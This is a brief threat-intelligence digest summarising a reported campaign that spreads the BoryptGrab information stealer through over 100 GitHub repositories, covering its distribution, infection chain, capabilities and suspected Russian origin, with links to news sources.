Key Findings

• BoryptGrab information stealer spreading through over 100 GitHub repositories

• Malware designed to collect browser data, cryptocurrency wallets, system details, and user files

• Some variants deploy a PyInstaller backdoor called TunnesshClient for remote command execution

Background

Trend Micro has uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories. BoryptGrab is capable of collecting sensitive data such as browser and cryptocurrency wallet information, system details, and common user files.

Malware Distribution

• Malware distributed via ZIP archives posing as software tools and game cheats, linked to GitHub repositories

• Repositories stuffed with SEO keywords to rank higher in search results

• Fake download pages redirect victims through encoded URLs to malicious ZIP files

Infection Vectors

• Executable side-loads malicious libcurl.DLL that decrypts a hidden launcher payload

• Launcher downloads BoryptGrab stealer and may retrieve other payloads like Vidar, TunnesshClient backdoor, and HeaconLoad downloader

• VBS downloader hides commands in integer arrays, downloads launcher that retrieves BoryptGrab

BoryptGrab Capabilities

• Designed to collect large amounts of sensitive data from infected systems

• Accepts command-line arguments to specify output path and build name for tracking infections

• Performs anti-analysis checks, such as detecting virtual machines and elevated privileges

Potential Russian Origins

• Russian-language comments and infrastructure suggest threat actors may have Russian background

• Consistent use of URL-fetching logic and overlapping tactics indicate a coordinated campaign

Sources

• https://securityaffairs.com/189110/malware/massive-github-malware-operation-spreads-boryptgrab-stealer.html

• https://www.reddit.com/r/pwnhub/comments/1rndi3o/over_100_github_repositories_spreading_boryptgrab/